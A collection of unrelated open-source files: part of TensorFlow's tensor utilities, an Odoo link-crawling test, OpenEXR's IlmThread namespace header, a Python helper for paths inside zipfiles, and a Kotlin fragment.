    # BUG FIX: np.fromstring is deprecated for binary data; np.frombuffer is
    # the supported equivalent.  frombuffer yields a read-only view over the
    # proto's bytes, so copy() to keep returning a writable array as before.
    return np.frombuffer(tensor.tensor_content,
                         dtype=dtype).copy().reshape(shape)
  elif tensor_dtype == dtypes.float16:
    # the half_val field of the TensorProto stores the binary representation
    # of the fp16: we need to reinterpret this as a proper float16
    if len(tensor.half_val) == 1:
      tmp = np.array(tensor.half_val[0], dtype=np.uint16)
      tmp.dtype = np.float16
      return np.repeat(tmp, num_elements).reshape(shape)
    else:
      tmp = np.fromiter(tensor.half_val, dtype=np.uint16)
      tmp.dtype = np.float16
      return tmp.reshape(shape)
  elif tensor_dtype == dtypes.float32:
    # A single value means "broadcast this scalar to the full shape".
    if len(tensor.float_val) == 1:
      return np.repeat(np.array(tensor.float_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.fromiter(tensor.float_val, dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.float64:
    if len(tensor.double_val) == 1:
      return np.repeat(np.array(tensor.double_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.fromiter(tensor.double_val, dtype=dtype).reshape(shape)
  elif tensor_dtype in [dtypes.int32, dtypes.uint8, dtypes.uint16, dtypes.int16,
                        dtypes.int8, dtypes.qint32, dtypes.quint8, dtypes.qint8,
                        dtypes.qint16, dtypes.quint16, dtypes.bfloat16]:
    # All sub-int64 integer types share the int_val field.
    if len(tensor.int_val) == 1:
      return np.repeat(np.array(tensor.int_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.fromiter(tensor.int_val, dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.int64:
    if len(tensor.int64_val) == 1:
      return np.repeat(np.array(tensor.int64_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.fromiter(tensor.int64_val, dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.string:
    if len(tensor.string_val) == 1:
      return np.repeat(np.array(tensor.string_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.array(list(tensor.string_val), dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.complex64:
    # scomplex_val stores interleaved (real, imag) float pairs.
    it = iter(tensor.scomplex_val)
    if len(tensor.scomplex_val) == 2:
      return np.repeat(np.array(complex(tensor.scomplex_val[0],
                                        tensor.scomplex_val[1]), dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.array([complex(x[0], x[1]) for x in zip(it, it)],
                      dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.complex128:
    it = iter(tensor.dcomplex_val)
    if len(tensor.dcomplex_val) == 2:
      return np.repeat(np.array(complex(tensor.dcomplex_val[0],
                                        tensor.dcomplex_val[1]), dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.array([complex(x[0], x[1]) for x in zip(it, it)],
                      dtype=dtype).reshape(shape)
  elif tensor_dtype == dtypes.bool:
    if len(tensor.bool_val) == 1:
      return np.repeat(np.array(tensor.bool_val[0], dtype=dtype),
                       num_elements).reshape(shape)
    else:
      return np.fromiter(tensor.bool_val, dtype=dtype).reshape(shape)
  else:
    raise TypeError("Unsupported tensor type: %s" % tensor.dtype)
def ShapeEquals(tensor_proto, shape):
  """Returns True if "tensor_proto" has the given "shape".

  Args:
    tensor_proto: A TensorProto.
    shape: A tensor shape, expressed as a TensorShape, list, or tuple.

  Returns:
    True if "tensor_proto" has the given "shape", otherwise False.

  Raises:
    TypeError: If "tensor_proto" is not a TensorProto, or shape is not a
      TensorShape, list, or tuple.
  """
  if not isinstance(tensor_proto, tensor_pb2.TensorProto):
    raise TypeError("tensor_proto is not a tensor_pb2.TensorProto object")
  if isinstance(shape, tensor_shape_pb2.TensorShapeProto):
    shape = [d.size for d in shape.dim]
  elif not isinstance(shape, (list, tuple)):
    raise TypeError("shape is not a list or tuple")
  tensor_shape_list = [d.size for d in tensor_proto.tensor_shape.dim]
  # BUG FIX: zip() truncates to the shorter sequence, so shapes of different
  # rank that shared a prefix (e.g. [2, 3] vs [2, 3, 4]) used to compare
  # equal.  Require equal rank explicitly before the element-wise check.
  if len(tensor_shape_list) != len(shape):
    return False
  return all(x == y for x, y in zip(tensor_shape_list, shape))
def _ConstantValue(tensor):
  """Best-effort partial evaluation of `tensor` into a numpy ndarray.

  Dispatches on the producing op's type for a fixed set of ops (Const,
  Shape, Size, Rank, Range, Cast, Concat, ConcatV2, Pack, Fill) and
  returns None whenever any required input cannot itself be evaluated.

  Args:
    tensor: An `ops.Tensor`.

  Returns:
    A numpy ndarray with the constant value, or None if it cannot be
    computed.

  Raises:
    TypeError: if `tensor` is not an `ops.Tensor`.
  """
  # TODO(touts): Support Variables?
  if not isinstance(tensor, ops.Tensor):
    raise TypeError("tensor is not a Tensor")
  if tensor.op.type == "Const":
    return MakeNdarray(tensor.op.get_attr("value"))
  elif tensor.op.type == "Shape":
    # A Shape op is constant whenever its input's static shape is known.
    input_shape = tensor.op.inputs[0].get_shape()
    if input_shape.is_fully_defined():
      return np.array([dim.value for dim in input_shape.dims],
                      dtype=tensor.dtype.as_numpy_dtype)
    else:
      return None
  elif tensor.op.type == "Size":
    input_shape = tensor.op.inputs[0].get_shape()
    if input_shape.is_fully_defined():
      return np.prod([dim.value for dim in input_shape.dims], dtype=np.int32)
    else:
      return None
  elif tensor.op.type == "Rank":
    # Rank only needs the number of dimensions, not their sizes.
    input_shape = tensor.op.inputs[0].get_shape()
    if input_shape.ndims is not None:
      return np.ndarray(shape=(), buffer=np.array([input_shape.ndims]),
                        dtype=np.int32)
    else:
      return None
  elif tensor.op.type == "Range":
    start = constant_value(tensor.op.inputs[0])
    if start is None:
      return None
    limit = constant_value(tensor.op.inputs[1])
    if limit is None:
      return None
    delta = constant_value(tensor.op.inputs[2])
    if delta is None:
      return None
    return np.arange(start, limit, delta, dtype=tensor.dtype.as_numpy_dtype)
  elif tensor.op.type == "Cast":
    pre_cast = constant_value(tensor.op.inputs[0])
    if pre_cast is None:
      return None
    cast_dtype = dtypes.as_dtype(tensor.op.get_attr("DstT"))
    return pre_cast.astype(cast_dtype.as_numpy_dtype)
  elif tensor.op.type == "Concat":
    # Concat takes the axis as its *first* input; ConcatV2 (below) takes it
    # as the *last* input.
    dim = constant_value(tensor.op.inputs[0])
    if dim is None:
      return None
    values = []
    for x in tensor.op.inputs[1:]:
      value = constant_value(x)
      if value is None:
        return None
      values.append(value)
    return np.concatenate(values, axis=dim)
  elif tensor.op.type == "ConcatV2":
    dim = constant_value(tensor.op.inputs[-1])
    if dim is None:
      return None
    values = []
    for x in tensor.op.inputs[:-1]:
      value = constant_value(x)
      if value is None:
        return None
      values.append(value)
    return np.concatenate(values, axis=dim)
  elif tensor.op.type == "Pack":
    values = []
    # Some imported GraphDefs have Pack ops with zero inputs. Those are invalid
    # and shouldn't be produced, but to deal sensibly with them here we check
    # and return None.
    if not tensor.op.inputs:
      return None
    for x in tensor.op.inputs:
      value = constant_value(x)
      if value is None:
        return None
      values.append(value)
    return np.array(values)
  elif tensor.op.type == "Fill":
    fill_shape = tensor.shape
    fill_value = constant_value(tensor.op.inputs[1])
    if fill_shape.is_fully_defined() and fill_value is not None:
      return np.full(fill_shape.as_list(), fill_value, dtype=fill_value.dtype)
    else:
      return None
  else:
    # Unrecognized op type: not statically evaluable.
    return None
def constant_value(tensor):
  """Returns the constant value of the given tensor, if efficiently calculable.

  Attempts to partially evaluate `tensor`; on success the value is returned
  as a numpy ndarray, otherwise None.

  TODO(mrry): Consider whether this function should use a registration
  mechanism like gradients and ShapeFunctions, so that it is easily
  extensible.

  NOTE: A non-`None` result makes it impossible to feed a different value
  for `tensor` afterwards; this lets the result safely influence graph
  construction and static shape optimizations.

  Args:
    tensor: The Tensor to be evaluated.

  Returns:
    A numpy ndarray containing the constant value of the given `tensor`,
    or None if it cannot be calculated.

  Raises:
    TypeError: if tensor is not an ops.Tensor.
  """
  result = _ConstantValue(tensor)
  if result is None:
    return None
  # Callers may now rely on this value, so the tensor must never be fed.
  tensor.graph.prevent_feeding(tensor)
  return result
def constant_value_as_shape(tensor):  # pylint: disable=invalid-name
  """A version of `constant_value()` that returns a `TensorShape`.

  This version should be used when a constant tensor value is
  interpreted as a (possibly partial) shape, e.g. in the shape
  function for `tf.reshape()`. By explicitly requesting a
  `TensorShape` as the return value, it is possible to represent
  unknown dimensions; by contrast, `constant_value()` is
  all-or-nothing.

  Args:
    tensor: The rank-1 Tensor to be evaluated.

  Returns:
    A `TensorShape` based on the constant value of the given `tensor`.
  """
  shape = tensor.get_shape().with_rank(1)
  # A zero-element vector encodes the shape of a scalar.
  if tensor.get_shape() == [0]:
    return tensor_shape.scalar()
  elif tensor.op.type == "Shape":
    # Shape(x) as a shape is just x's (possibly partial) static shape.
    return tensor.op.inputs[0].get_shape()
  elif tensor.op.type == "Pack":
    ret = tensor_shape.scalar()  # Empty list.
    for pack_input in tensor.op.inputs:
      # `pack_input` must be a scalar. Attempt to evaluate it, and append it
      # to `ret`.
      pack_input_val = constant_value(pack_input)
      # A negative value (e.g. reshape's -1 wildcard) is treated as unknown.
      if pack_input_val is None or pack_input_val < 0:
        new_dim = tensor_shape.Dimension(None)
      else:
        new_dim = tensor_shape.Dimension(pack_input_val)
      ret = ret.concatenate([new_dim])
    return ret
  elif tensor.op.type == "Concat":
    # We assume that `tensor.op.inputs[0]` evaluates to 0, as this is
    # the only legal value when concatenating vectors, and it will
    # have been checked by a previous shape function.
    ret = tensor_shape.scalar()  # Empty list.
    for concat_input in tensor.op.inputs[1:]:
      # `concat_input` must be a vector. Attempt to evaluate it as a shape,
      # and concatenate it with `ret`.
      ret = ret.concatenate(constant_value_as_shape(concat_input))
    return ret
  elif tensor.op.type == "ConcatV2":
    # We assume that `tensor.op.inputs[-1]` evaluates to 0, as this is
    # the only legal value when concatenating vectors, and it will
    # have been checked by a previous shape function.
    ret = tensor_shape.scalar()  # Empty list.
    for concat_input in tensor.op.inputs[:-1]:
      # `concat_input` must be a vector. Attempt to evaluate it as a shape,
      # and concatenate it with `ret`.
      ret = ret.concatenate(constant_value_as_shape(concat_input))
    return ret
  else:
    # Fall back: the vector's length bounds the rank, and any elements that
    # evaluate to -1 become unknown dimensions.
    ret = tensor_shape.unknown_shape(shape[0].value)
    value = constant_value(tensor)
    if value is not None:
      ret = ret.merge_with(tensor_shape.TensorShape(
          [d if d != -1 else None for d in value]))
    return ret
def is_tensor(x):  # pylint: disable=invalid-name
  """Check whether `x` is of tensor type.

  Check whether an object is a tensor. Equivalent to
  `isinstance(x, [tf.Tensor, tf.SparseTensor, tf.Variable])`.

  Args:
    x: An python object to check.

  Returns:
    `True` if `x` is a tensor, `False` if not.
  """
  if isinstance(x, ops._TensorLike):  # pylint: disable=protected-access
    return True
  return ops.is_dense_tensor_like(x)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
import logging
import urlparse
import time
import lxml.html
import openerp
import re
_logger = logging.getLogger(__name__)
class Crawler(openerp.tests.HttpCase):
    """ Test suite crawling an openerp CMS instance and checking that all
    internal links lead to a 200 response.

    If a username and a password are provided, authenticates the user before
    starting the crawl
    """

    at_install = False
    post_install = True

    def crawl(self, url, seen=None, msg=''):
        """Fetch *url*, assert a 2xx response, and recurse into every
        internal link of the returned HTML page.

        Returns the set of visited URL "slugs" (URLs with record ids and
        query values normalised) so each distinct page is fetched once.
        """
        # BUG FIX: was `seen == None`; None must be tested by identity.
        if seen is None:
            seen = set()

        # Normalise record ids and query values so e.g. /blog/3 and /blog/4
        # map to the same slug and are crawled only once.
        url_slug = re.sub(r"[/](([^/=?&]+-)?[0-9]+)([/]|$)", '/<slug>/', url)
        # BUG FIX: replacement was a non-raw string; `\g` is an invalid
        # escape sequence.  Raw string keeps the same runtime value.
        url_slug = re.sub(r"([^/=?&]+)=[^/=?&]+", r'\g<1>=param', url_slug)
        if url_slug in seen:
            return seen
        else:
            seen.add(url_slug)

        _logger.info("%s %s", msg, url)
        r = self.url_open(url)
        code = r.getcode()
        self.assertIn(code, xrange(200, 300), "%s Fetching %s returned error response (%d)" % (msg, url, code))

        if r.info().gettype() == 'text/html':
            doc = lxml.html.fromstring(r.read())
            for link in doc.xpath('//a[@href]'):
                href = link.get('href')

                parts = urlparse.urlsplit(href)
                # href with any fragment removed
                href = urlparse.urlunsplit((
                    parts.scheme,
                    parts.netloc,
                    parts.path,
                    parts.query,
                    ''
                ))

                # FIXME: handle relative link (not parts.path.startswith /)
                # Skip external links, backend (/web) pages, translated
                # duplicates and non-http schemes (mailto:, javascript:).
                if parts.netloc or \
                    not parts.path.startswith('/') or \
                    parts.path == '/web' or\
                    parts.path.startswith('/web/') or \
                    parts.path.startswith('/en_US/') or \
                    (parts.scheme and parts.scheme not in ('http', 'https')):
                    continue

                self.crawl(href, seen, msg)
        return seen

    def test_10_crawl_public(self):
        # Crawl anonymously and report throughput statistics.
        t0 = time.time()
        t0_sql = self.registry.test_cr.sql_log_count
        seen = self.crawl('/', msg='Anonymous Coward')
        count = len(seen)
        duration = time.time() - t0
        sql = self.registry.test_cr.sql_log_count - t0_sql
        _logger.log(25, "public crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request, ", count, duration, sql, duration/count, float(sql)/count)

    def test_20_crawl_demo(self):
        t0 = time.time()
        t0_sql = self.registry.test_cr.sql_log_count
        self.authenticate('demo', 'demo')
        seen = self.crawl('/', msg='demo')
        count = len(seen)
        duration = time.time() - t0
        sql = self.registry.test_cr.sql_log_count - t0_sql
        _logger.log(25, "demo crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request", count, duration, sql, duration/count, float(sql)/count)

    def test_30_crawl_admin(self):
        t0 = time.time()
        t0_sql = self.registry.test_cr.sql_log_count
        self.authenticate('admin', 'admin')
        seen = self.crawl('/', msg='admin')
        count = len(seen)
        duration = time.time() - t0
        sql = self.registry.test_cr.sql_log_count - t0_sql
        _logger.log(25, "admin crawled %s urls in %.2fs %s queries, %.3fs %.2fq per request", count, duration, sql, duration/count, float(sql)/count)
|
unknown
|
codeparrot/codeparrot-clean
| ||
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2012, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
#ifndef INCLUDED_ILMTHREADNAMESPACE_H
#define INCLUDED_ILMTHREADNAMESPACE_H
//
// The purpose of this file is to make it possible to specify an
// ILMTHREAD_INTERNAL_NAMESPACE as a preprocessor definition and have all of
// the IlmThread symbols defined within that namespace rather than the
// standard IlmThread namespace. Those symbols are made available to client
// code through the ILMTHREAD_NAMESPACE in addition to the
// ILMTHREAD_INTERNAL_NAMESPACE.
//
// To ensure source code compatibility, the ILMTHREAD_NAMESPACE defaults to
// IlmThread and then "using namespace ILMTHREAD_INTERNAL_NAMESPACE;" brings
// all of the declarations from the ILMTHREAD_INTERNAL_NAMESPACE into the
// ILMTHREAD_NAMESPACE. This means that client code can continue to use
// syntax like IlmThread::Thread, but at link time it will resolve to a
// mangled symbol based on the ILMTHREAD_INTERNAL_NAMESPACE.
//
// As an example, if one needed to build against a newer version of IlmThread
// and have it run alongside an older version in the same application, it is
// now possible to use an internal namespace to prevent collisions between
// the older versions of IlmThread symbols and the newer ones. To do this,
// the following could be defined at build time:
//
// ILMTHREAD_INTERNAL_NAMESPACE = IlmThread_v2
//
// This means that declarations inside IlmThread headers look like this
// (after the preprocessor has done its work):
//
// namespace IlmThread_v2 {
// ...
// class declarations
// ...
// }
//
// namespace IlmThread {
// using namespace IlmThread_v2;
// }
//
//
// Open Source version of this file pulls in the IlmBaseConfig.h file
// for the configure time options.
//
#include "IlmBaseConfig.h"
// The public namespace defaults to the historical "IlmThread" name unless
// the build overrides it.
#ifndef ILMTHREAD_NAMESPACE
#define ILMTHREAD_NAMESPACE IlmThread
#endif
// The internal (symbol-mangling) namespace defaults to the public one,
// i.e. no versioned namespace unless explicitly requested at build time.
#ifndef ILMTHREAD_INTERNAL_NAMESPACE
#define ILMTHREAD_INTERNAL_NAMESPACE ILMTHREAD_NAMESPACE
#endif
//
// We need to be sure that we import the internal namespace into the public one.
// To do this, we use the small bit of code below which initially defines
// ILMTHREAD_INTERNAL_NAMESPACE (so it can be referenced) and then defines
// ILMTHREAD_NAMESPACE and pulls the internal symbols into the public
// namespace.
//
namespace ILMTHREAD_INTERNAL_NAMESPACE {}
namespace ILMTHREAD_NAMESPACE {
     using namespace ILMTHREAD_INTERNAL_NAMESPACE;
}
//
// There are identical pairs of HEADER/SOURCE ENTER/EXIT macros so that
// future extension to the namespace mechanism is possible without changing
// project source code.
//
#define ILMTHREAD_INTERNAL_NAMESPACE_HEADER_ENTER namespace ILMTHREAD_INTERNAL_NAMESPACE {
#define ILMTHREAD_INTERNAL_NAMESPACE_HEADER_EXIT }
#define ILMTHREAD_INTERNAL_NAMESPACE_SOURCE_ENTER namespace ILMTHREAD_INTERNAL_NAMESPACE {
#define ILMTHREAD_INTERNAL_NAMESPACE_SOURCE_EXIT }
#endif // INCLUDED_ILMTHREADNAMESPACE_H
|
c
|
github
|
https://github.com/opencv/opencv
|
3rdparty/openexr/IlmThread/IlmThreadNamespace.h
|
"""
A helper module that can work with paths
that can refer to data inside a zipfile
XXX: Need to determine if isdir("zipfile.zip")
should return True or False. Currently returns
True, but that might do the wrong thing with
data-files that are zipfiles.
"""
import os as _os
import zipfile as _zipfile
import errno as _errno
import time as _time
import sys as _sys
import stat as _stat
# Fallback st_mode values for zip members that carry no mode bits of their
# own: drwxr-xr-x for directories, -r--r--r-- for files.
_DFLT_DIR_MODE = (
    _stat.S_IFDIR
    | _stat.S_IXOTH
    | _stat.S_IXGRP
    | _stat.S_IXUSR
    | _stat.S_IROTH
    | _stat.S_IRGRP
    | _stat.S_IRUSR)
_DFLT_FILE_MODE = (
    _stat.S_IFREG
    | _stat.S_IROTH
    | _stat.S_IRGRP
    | _stat.S_IRUSR)
# Python 2's StringIO has no context-manager support; wrap it so callers can
# use `with`.  On Python 3 the io classes already support it.
if _sys.version_info[0] == 2:
    from StringIO import StringIO as _BaseStringIO
    # NOTE(review): bytes are served through plain StringIO on Python 2 --
    # presumably adequate since Py2 str is bytes; confirm if true BytesIO
    # semantics are ever needed.
    from StringIO import StringIO as _BaseBytesIO

    class _StringIO (_BaseStringIO):
        def __enter__(self):
            return self

        def __exit__(self, exc_type, exc_value, traceback):
            self.close()
            # Do not suppress exceptions.
            return False

    class _BytesIO (_BaseBytesIO):
        def __enter__(self):
            return self

        def __exit__(self, exc_type, exc_value, traceback):
            self.close()
            return False

else:
    from io import StringIO as _StringIO
    from io import BytesIO as _BytesIO
def _locate(path):
    """Split *path* into (filesystem_path, zip_member_path).

    Returns ``(path, None)`` when *path* exists directly on the
    filesystem.  Otherwise walks up the path until an existing prefix is
    found; that prefix must be a regular file (presumably a zipfile) and
    the remainder is returned as a '/'-joined member path.

    Raises:
        IOError: (ENOENT) when no prefix of *path* is an existing file.
    """
    full_path = path
    if _os.path.exists(path):
        return path, None

    rest = []
    # BUG FIX: splitdrive() returns a (drive, tail) tuple; the original code
    # bound the whole tuple, so the `path != root` loop guard could never
    # fire.  Only the drive component is the correct termination point.
    root = _os.path.splitdrive(path)[0]
    while path and path != root:
        path, bn = _os.path.split(path)
        rest.append(bn)
        if _os.path.exists(path):
            break

    if path == root:
        # Walked all the way up without finding anything.
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")

    if not _os.path.isfile(path):
        # The existing prefix is a directory, so the trailing components
        # simply do not exist.
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")

    rest.reverse()
    return path, '/'.join(rest).strip('/')
# Keep a reference to the builtin before shadowing it below.
_open = open

def open(path, mode='r'):
    """Open *path* for reading.

    Behaves like the builtin ``open`` for regular filesystem paths; when
    *path* refers to a member inside a zipfile the member's contents are
    returned as an in-memory file object.  Only read access is supported.
    """
    # Zip members are read-only: reject every write/update mode up front.
    if 'w' in mode or 'a' in mode:
        raise IOError(
            _errno.EINVAL, path, "Write access not supported")
    elif 'r+' in mode:
        raise IOError(
            _errno.EINVAL, path, "Write access not supported")

    full_path = path
    path, rest = _locate(path)
    if not rest:
        # Plain filesystem file: delegate to the saved builtin.
        return _open(path, mode)

    try:
        zf = _zipfile.ZipFile(path, 'r')
    except _zipfile.error:
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")

    try:
        data = zf.read(rest)
    except (_zipfile.error, KeyError):
        zf.close()
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    zf.close()

    if mode == 'rb':
        return _BytesIO(data)

    if _sys.version_info[0] == 3:
        data = data.decode('ascii')
    return _StringIO(data)
def listdir(path):
    """Return the names of the entries in the directory *path*.

    Works like ``os.listdir`` for filesystem directories; when *path*
    resolves into a zipfile, the member names directly below it are
    synthesised from the archive's namelist.

    Raises:
        IOError: (ENOENT) if the path does not exist, or cannot be read
            as a zipfile.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest and not _os.path.isfile(path):
        # Ordinary directory on the filesystem.
        return _os.listdir(path)
    else:
        try:
            zf = _zipfile.ZipFile(path, 'r')
        except _zipfile.error:
            raise IOError(
                _errno.ENOENT, full_path,
                "No such file or directory")
        result = set()
        # `seen` records whether the requested directory exists at all in
        # the archive (zipfiles need not contain explicit directory entries).
        seen = False
        try:
            for nm in zf.namelist():
                if rest is None:
                    # Listing the root of the zipfile: first path component.
                    seen = True
                    value = nm.split('/')[0]
                    if value:
                        result.add(value)
                elif nm.startswith(rest):
                    if nm == rest:
                        # Exact member match proves existence but adds no entry.
                        seen = True
                        value = ''
                        pass
                    elif nm[len(rest)] == '/':
                        # Member below the directory: take the next component.
                        seen = True
                        value = nm[len(rest)+1:].split('/')[0]
                    else:
                        # Shared prefix only (e.g. "foobar" vs "foo"): ignore.
                        value = None
                    if value:
                        result.add(value)
        except _zipfile.error:
            zf.close()
            raise IOError(
                _errno.ENOENT, full_path,
                "No such file or directory")
        zf.close()
        if not seen:
            raise IOError(
                _errno.ENOENT, full_path,
                "No such file or directory")
        return list(result)
def isfile(path):
    """Return True if *path* refers to a regular file.

    A filesystem file that is itself a valid zipfile is treated as a
    directory (consistent with ``isdir`` below).  A path resolving to a
    zip member is a file unless it names a (possibly implicit) directory.

    Raises:
        IOError: (ENOENT) if the path does not exist at all.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest:
        if not _os.path.isfile(path):
            return False
        # BUG FIX: the successfully opened ZipFile used to be leaked here.
        try:
            zf = _zipfile.ZipFile(path, 'r')
        except (_zipfile.error, IOError):
            # Not a zipfile: it is just a regular file.
            return True
        zf.close()
        return False

    # BUG FIX: previously a failure of the ZipFile constructor left
    # `zf = None` and the handler then crashed with AttributeError on
    # `zf.getinfo`; the handler also kept using `zf` *after* closing it.
    try:
        zf = _zipfile.ZipFile(path, 'r')
    except _zipfile.error:
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    try:
        try:
            zf.getinfo(rest)
        except KeyError:
            pass
        else:
            # Exact member entry: a file.
            return True
        # Check if this is a directory (explicit entry first, then implicit).
        try:
            zf.getinfo(rest + '/')
        except KeyError:
            pass
        else:
            return False
        prefix = rest + '/'
        for nm in zf.namelist():
            if nm.startswith(prefix):
                # Directory
                return False
        # No trace in zipfile
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    finally:
        zf.close()
def isdir(path):
    """Return True if *path* refers to a directory.

    A filesystem file that is a valid zipfile is treated as a directory.
    Inside a zipfile, a path is a directory when an explicit directory
    entry exists or when members live below it.

    Raises:
        IOError: (ENOENT) if the path does not exist at all.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest:
        if _os.path.isdir(path):
            return True
        # BUG FIX: the ZipFile opened here used to be leaked on success.
        try:
            zf = _zipfile.ZipFile(path, 'r')
        except (_zipfile.error, IOError):
            return False
        zf.close()
        return True

    zf = None
    try:
        try:
            zf = _zipfile.ZipFile(path)
        except _zipfile.error:
            raise IOError(
                _errno.ENOENT, full_path,
                "No such file or directory")
        try:
            zf.getinfo(rest)
        except KeyError:
            pass
        else:
            # Plain member entry: a file, not a directory.
            return False
        rest = rest + '/'
        try:
            zf.getinfo(rest)
        except KeyError:
            pass
        else:
            # Explicit directory entry found.
            return True
        for nm in zf.namelist():
            if nm.startswith(rest):
                # Implicit directory: members exist below it.
                return True
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    finally:
        if zf is not None:
            zf.close()
def islink(path):
    """Return True if *path* is a symbolic link.

    Zipfile members are never reported as symlinks; a path that resolves
    into a zipfile only checks for existence and then returns False.

    Raises:
        IOError: (ENOENT) if the path does not exist inside the zipfile.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest:
        # Plain filesystem path: delegate.
        return _os.path.islink(path)
    try:
        zf = _zipfile.ZipFile(path)
    except _zipfile.error:
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    try:
        try:
            info = zf.getinfo(rest)
        except KeyError:
            pass
        else:
            # File
            return False
        rest += '/'
        try:
            info = zf.getinfo(rest)
        except KeyError:
            pass
        else:
            # Directory
            return False
        for nm in zf.namelist():
            if nm.startswith(rest):
                # Directory without listing
                return False
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    finally:
        zf.close()
def readlink(path):
    """Return the target of the symbolic link *path*.

    Paths that resolve into a zipfile always raise, because zip members
    cannot be symlinks.
    """
    filesystem_path, rest = _locate(path)
    if rest:
        # No symlinks inside zipfiles
        raise OSError(_errno.ENOENT, path, "No such file or directory")
    return _os.readlink(filesystem_path)
def getmode(path):
    """Return the st_mode bits for *path*.

    For zip members the mode is taken from the entry's ``external_attr``
    (upper 16 bits) when present; otherwise default file/directory modes
    are synthesised.

    Raises:
        IOError: (ENOENT) if the path does not exist.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest:
        return _os.stat(path).st_mode

    # BUG FIX: the ZipFile used to be closed only on the (dead) KeyError
    # path, leaking the handle on every successful lookup; a non-zipfile
    # also raised a raw zipfile.error instead of the module's IOError.
    try:
        zf = _zipfile.ZipFile(path)
    except _zipfile.error:
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    try:
        info = None
        try:
            info = zf.getinfo(rest)
        except KeyError:
            pass
        if info is None:
            # Try an explicit directory entry.
            try:
                info = zf.getinfo(rest + '/')
            except KeyError:
                pass
        if info is None:
            prefix = rest + '/'
            for nm in zf.namelist():
                if nm.startswith(prefix):
                    break
            else:
                raise IOError(
                    _errno.ENOENT, full_path,
                    "No such file or directory")
            # Directory exists, but has no entry of its own.
            return _DFLT_DIR_MODE
        # The mode is stored without file-type in external_attr.
        if (info.external_attr >> 16) != 0:
            return _stat.S_IFREG | (info.external_attr >> 16)
        else:
            return _DFLT_FILE_MODE
    finally:
        zf.close()
def getmtime(path):
    """Return the modification time of *path* as a POSIX timestamp.

    For zip members the timestamp comes from the entry's ``date_time``;
    directories without an explicit entry fall back to the mtime of the
    zipfile itself.

    Raises:
        IOError: (ENOENT) if the path does not exist.
    """
    full_path = path
    path, rest = _locate(path)
    if not rest:
        return _os.path.getmtime(path)

    # BUG FIX: the ZipFile used to be closed only on the (dead) KeyError
    # path, leaking the handle on every successful lookup; a non-zipfile
    # also raised a raw zipfile.error instead of the module's IOError.
    try:
        zf = _zipfile.ZipFile(path)
    except _zipfile.error:
        raise IOError(
            _errno.ENOENT, full_path,
            "No such file or directory")
    try:
        info = None
        try:
            info = zf.getinfo(rest)
        except KeyError:
            pass
        if info is None:
            # Try an explicit directory entry.
            try:
                info = zf.getinfo(rest + '/')
            except KeyError:
                pass
        if info is None:
            prefix = rest + '/'
            for nm in zf.namelist():
                if nm.startswith(prefix):
                    break
            else:
                raise IOError(
                    _errno.ENOENT, full_path,
                    "No such file or directory")
            # Directory exists, but has no entry of its
            # own, fake mtime by using the timestamp of
            # the zipfile itself.
            return _os.path.getmtime(path)
        # date_time is a (Y, M, D, h, m, s) tuple; extend for mktime with
        # DST flag -1 (let the C library decide).
        return _time.mktime(info.date_time + (0, 0, -1))
    finally:
        zf.close()
|
unknown
|
codeparrot/codeparrot-clean
| ||
@file:JvmMultifileClass
